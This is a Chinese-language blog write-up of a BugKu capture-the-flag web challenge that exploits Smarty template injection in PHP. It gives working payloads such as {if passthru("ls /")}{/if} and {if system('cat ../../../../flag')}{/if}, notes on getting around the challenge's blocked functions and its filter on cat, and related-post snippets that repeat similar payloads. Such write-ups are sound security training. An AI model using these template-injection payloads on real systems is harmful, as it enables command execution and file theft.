聪明的php

最新推荐文章于 2023-03-28 15:53:45 发布
最新推荐文章于 2023-03-28 15:53:45 发布
阅读量2.2k 收藏 20
点赞数 18
分类专栏: BugKu 信息安全 文章标签: php 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/120380488
版权

聪明的php

一、解题思路

1.根据题目提示
在这里插入图片描述
2.那么我们直接使用随便传入一个参数

http://114.67.246.176:18387/?a=1

在这里插入图片描述
3.传入参数,一般情况下是文件包含,或者命令执行,而这道题目比较新颖,使用的是php模板注入
在这里插入图片描述
4.根据测试2*4=8,确定是smarty模板注入

测试phpinfo()函数

http://114.67.246.176:18387/?a={if phpinfo()}{/if}

在这里插入图片描述

5.真的是百密一疏,过滤了好多的函数,好在没有把passthru()函数过滤

http://114.67.246.176:18387/?a={if passthru("ls /")}{/if}

在这里插入图片描述
6.没有发现flag,但是发现_12016文件,直接读一波,cat被过滤了,我是用的是more

http://114.67.246.176:18387/?a={if passthru("more /_12016 ")}{/if}

在这里插入图片描述
得到flag

 flag{9fc0c291721a0b01e30ab0ec56f0165e}

二、知识点

1. 常用payload
smary中的{if}标签中可以执行的php语句

{if phpinfo()}{/if}
{if system('ls')}{/if}
{if readfile('/flag')}{/if}
{if show_source('/flag')}{/if}
{if system('cat ../../../../flag')}{/if}

2.passthru()函数
(PHP 4, PHP 5, PHP 7, PHP 8)
passthru — 执行外部程序并且显示原始输出

语法:

 passthru(string $command, int &$return_var = ?): void

exec() 函数类似, passthru() 函数 也是用来执行外部命令(command)的。 当所执行的 Unix 命令输出二进制数据, 并且需要直接传送到浏览器的时候, 需要用此函数来替代 exec()system() 函数。 常用来执行诸如 pbmplus 之类的可以直接输出图像流的命令。 通过设置 Content-typeimage/gif, 然后调用 pbmplus 程序输出 gif 文件, 就可以从 PHP 脚本中直接输出图像到浏览器。

3.cat绕过
可以使用其他函数如:lessmoretac

三、参考链接

passthru()函数
思路参考链接

山川绿水
关注
  • 18
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
聪明PHP
chbeloved的博客
07-27 150
看完源码啥也没有,照页面意思先传参。 怀疑是smarty注入模板。 对照被过滤的一大堆函数,剩下passthru能用。模板{if passthru()}{/if}。 Cat这些也被过滤了,就先用ls指令。 在源码查看会更整齐。 到这里也不懂那么多,随缘查法,排除var usr lib 这些不太可能的文件,就只剩那么几个,就都查一遍呗,没查几次就出flag了(用tac查) ...
bugku CTF 聪明php
m0_52149675的博客
04-11 372
bugku CTF 聪明php
Bugku web 聪明php
weixin_49633310的博客
03-17 2626
Bugku web 聪明php模板注入打开题目 模板注入 打开题目 得到提示,传递参数 随机传一个参数,得到源码 在这地方卡了挺久的,发现smarty是个模板,测试一下是不是模板注入 确实为smarty模板注入 常用payload {if phpinfo()}{/if} {if system('ls')}{/if} {if readfile('/flag')}{/if} {if show_source('/flag')}{/if} {if system('cat ../../../flag'
聪明php(Bugku)
m0_70347972的博客
09-22 482
输入cat命令直接查看文件中的flag
BugkuWeb:聪明PHP
Light_inthe_eyes的博客
11-03 322
提示让我们传参: 随便url里传入一个参数,得到一串代码: 代码审计,当为False时都会跳转到template.html,在elseif中过滤了很多读取的命令。 出于习惯,随手就来了个简单的模板注入,发现有回显!: 这道题是一道Smarty的模板注入,查找资料: Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI 有很大区别。 一般情况下输入{$smarty.version}就可以看到返回的smarty的版本号。 Smarty支持使用{php}{/php}标
bugku--聪明PHP
最新发布
m0_65766842的博客
03-28 364
Smarty库的注入
Bugku 聪明php
qq_53460654的博客
05-04 225
进入环境发现: pass a parameter and maybe the flag file’s filename is random ???? 意思是传递一个参数 所以我们get传参试试 进行代码审计: 发现smarty是个模板,测试一下是不是模板注入 所以 我们要了解一下smarty模板注入 然后发现过滤了很多函数,但是passthru没有被过滤 passthru()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmpl
bugku 聪明php
qq_52671379的博客
08-03 522
bugku 聪明php 题目 打开靶机地址 此处提示需要随意传入一个参数 随机传一个参数,得到源码 发现smarty是个模板,测试一下是不是模板注入 传值?a={{2*2}}测试是否执行 看到被执行了,非常奈斯 存在命令执行漏洞,过滤了不少函数,但看了一下,passthru没有被过滤 这个函数可以代替system() 1、more ./*|grep fla用来匹配当前目录下,文件内容里有fla的,直接输出文件内容 2、passthru替代system,more替代cat/ 3、more命令,功能类似 c
BugKu_web-聪明PHP(smarty 模板注入)
羽的博客
06-30 266
一开始叫传个值进去。 得到源码: smarty模板注入 成功,说明存在模板注入,存在命令执行。 接着就是找flag了。 这里过滤了很多关键词 不过我们依然可以用passthru和tac来读取flag 注意:flag不在当前目录下,要进行目录跳转。 ls ../ ls -al / 看到一个奇怪的数字目录 读取他 tac /_13883 ...
Bugku CTF 每日一题 聪明php
彼岸花苏陌的博客
01-12 414
聪明php 进入环境 发现出现这个 pass a parameter and maybe the flag file's filename is random :> 百度翻译一下 发现是 传递一个参数,可能标记文件的文件名是随机的: 于是传一下参,在原网页后面加上/?a=1,发现网页出现了变化 因为看不懂 $smarty->display 所以百度了一下 发现是smarty模板引擎的东西,于是想到了SSTI模板引擎注入 学习了一篇文章后 https://baijiahao.baidu.
【攻防世界-Web】Web_php_unserialize解题思路
一个手掰橙的博客
10-10 183
攻防世界CTF Web题目
SQL 盲注
m_de_g的博客
11-15 786
SQL 盲注 一、盲注介绍 Blind SQL(盲注)是注入攻击的其中一种,向数据库发送true或flase这样的问题,并根据应用程序返回的信息判断结果,这种攻击的出现是因为应用程序配置为只显示常规错误,但并没有解决SQL注入存在的代码问题。 当攻击者利用SQL注入漏洞进行攻击时,有时候web应用程序会显示,后端数据库执行SQL查询返回错误信息。Blind SQL(盲注)与常规注入很接近,不同的数据库返回数据的检索方式,若数据库没有输出数据到WEB页面,攻击者会询问一些列的True或Flase问题,强制从数
VMware 搭建linux操作系统,入门必看
m_de_g的博客
09-10 3991
很多小伙伴,刚开始学习Linux可能很枯燥,那是因为你少了环境。正所谓是——工欲善其事,必先利其器。要想入门Linux,我们不得不有VMare和Linux这两个宝贝。由于VM15.5的安装比较简单,在这里我就不再赘述,如果安装有问题的小伙伴,欢迎评论或私信。当然,你可能在为你的镜像亦或是安装包发愁,下面就无偿分享给大家,我一直以来使用的环境。话不多说,直接进入安装正题。
数据科学技术与应用——第2章 多维数据结构与运算
m_de_g的博客
10-20 2580
Python内部实现数组与标量相加时,使用“广播机制”先将标量5转换成元素值为5的5 x 7二维数组,再将scores和新生成的数组按位相加,等价于以下代码。例题[2-9] 生成均值为0、方差为1服从正态分布的4 x 5二维数组。生成5x6的二维随机整数,随机数的数值是0或1.数组的元素值随机生成,范围内的整数数组,数组的大小由参数。范围内各整数出现的概率相等。
php代码的一些高效写法
alct84178的博客
06-26 211
用单引号代替双引号来包含字符串,这样做会更快一些。因为PHP会在双引号包围的字符串中搜寻变量,单引号则不会,注意:只有echo能这么做,它是一种可以把多个字符串当作参数的“函数”(译注:PHP手册中说echo是语言结构,不是真正的函数,故把函数加上了双引号)。 如果能将类的方法定义成static,就尽量定义成static,它的速度会提升将近4倍。 $row['id'] 的速度是$...
各个模板注入的PAYLOAD
snowlyzz的博客
05-02 657
1、 模板引擎介绍 1.1 模板引擎介绍 在MVC的设计模式下,一般从 Model 层中读取数据,然后将数据传到 View 层渲染(渲染成 HTML 文件),而 View 层一般都会用到模板引擎。 模板引擎包含了各种参数,并能够由模板处理系统通过识别某些特定语法来替换这些参数的文档,用来生成输出文本(HTML网页,电子邮件,配置文件,源代码等)。 模板专注于如何展现数据,而在模板之外可以专注于要展示什么数据。模板引擎可以让网站程序实现界面与数据分离,业务代码与逻辑代码分离,这样提升了开发效.
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值